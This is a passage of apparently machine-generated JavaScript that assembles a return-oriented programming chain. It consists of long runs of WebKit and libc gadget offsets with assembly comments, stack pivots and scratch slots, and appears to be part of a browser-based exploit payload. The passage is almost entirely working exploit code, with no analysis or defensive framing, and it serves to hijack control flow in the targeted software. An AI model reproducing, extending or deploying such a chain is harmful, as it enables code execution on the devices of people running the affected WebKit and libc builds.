ropchain+543808, //L12011
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12011:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12012:
db([37, 0]); // 0x25
set_gadget(libc_base+144605,); //pop rdi
//L12013:
db([37, 0]); // 0x25
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+543936, //L12015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+543920, //L12014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12014:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12015:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+544016, //L12016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12016:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12018:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+544136, //L12021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+544120, //L12019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12019:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12021:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+544216, //L12023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+544248, //L12025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12023:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L12024:
ropchain+544376, //L12022
libc_base+144605 //pop rdi
]);
//L12025:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+544352, //L12027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+544368, //L12026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12027:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12026:
db([0, 0]); // 0x0
//L12022:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+544448, //L12028
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12028:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12030:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+544568, //L12033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+544552, //L12031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12031:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12033:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+544712, //L12036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+544680, //L12034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+544696, //L12035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12034:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12035:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12036:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+544800, //L12038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12037:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L12038:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+544856, //L12039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12039:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12041:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+544936, //L12043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12043:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+548864, //L10599
//L8577:
libc_base+764760, //pop rsi
ropchain+545032, //L12044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12044:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12046:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+545152, //L12049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+545136, //L12047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12047:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12049:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+545296, //L12052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+545264, //L12050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+545280, //L12051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12050:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12051:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12052:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+545376, //L12053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12053:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12055:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+545496, //L12058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+545480, //L12056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12056:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12058:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+545640, //L12061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+545608, //L12059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+545624, //L12060
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12059:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12060:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12061:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+545728, //L12063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12062:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L12063:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+545784, //L12064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12064:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12066:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+545864, //L12068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12068:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+545976, //L12069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12069:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12071:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+546096, //L12074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+546080, //L12072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12072:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12074:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+546240, //L12077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+546208, //L12075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+546224, //L12076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12075:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12076:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12077:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+546320, //L12078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12078:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12080:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+546440, //L12083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+546424, //L12081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12081:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12083:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+546520, //L12084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+546536, //L12085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12084:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12085:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+546696, //L12089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+546664, //L12087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+546680, //L12088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12086:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L12087:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12088:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12089:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+546752, //L12091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12091:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+546880, //L12093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+546896, //L12094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+546864, //L12092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12092:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12093:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12094:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+547056, //L12098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+547024, //L12096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+547040, //L12097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12095:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L12096:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12097:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12098:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+547112, //L12100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12100:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+547240, //L12102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+547256, //L12103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+547224, //L12101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12101:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12102:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12103:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+547416, //L12107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+547384, //L12105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+547400, //L12106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12104:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L12105:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12106:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12107:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+547472, //L12109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L12109:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+547600, //L12111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+547616, //L12112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+547584, //L12110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12110:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12111:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12112:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+547696, //L12113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+547712, //L12114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12113:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12114:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+547808, //L12116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+547792, //L12115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12115:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12116:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+547888, //L12117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12117:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12119:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+548008, //L12122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+547992, //L12120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12120:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12122:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+548088, //L12124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+548120, //L12126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12124:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L12125:
ropchain+548248, //L12123
libc_base+144605 //pop rdi
]);
//L12126:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+548224, //L12128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+548240, //L12127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12128:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12127:
db([0, 0]); // 0x0
//L12123:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+548320, //L12129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12129:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12131:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+548440, //L12134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+548424, //L12132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12132:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12134:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+548584, //L12137
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+548552, //L12135
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+548568, //L12136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12135:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12136:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12137:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+548672, //L12139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12138:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L12139:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+548728, //L12140
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12140:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12142:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+548808, //L12144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12144:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+548864, //L10599
//L10599:
libc_base+782311, //pop rsp
ropchain+548896, //L12145
//L6344:
libc_base+782311, //pop rsp
ropchain+548912, //L12146
//L12145:
libc_base+782311, //pop rsp
ropchain+318872, //L6308
//L12146:
libc_base+764760, //pop rsi
ropchain+548952, //L12147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12147:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12149:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+549072, //L12152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+549056, //L12150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12150:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12152:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+549216, //L12155
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+549184, //L12153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+549200, //L12154
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12153:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12154:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12155:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+549296, //L12156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12156:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12158:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+549416, //L12161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+549400, //L12159
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12159:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12161:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+549560, //L12164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+549528, //L12162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+549544, //L12163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12162:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12163:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12164:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+549640, //L12165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12165:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12167:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+549760, //L12170
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+549744, //L12168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12168:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12170:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+549872, //L12171
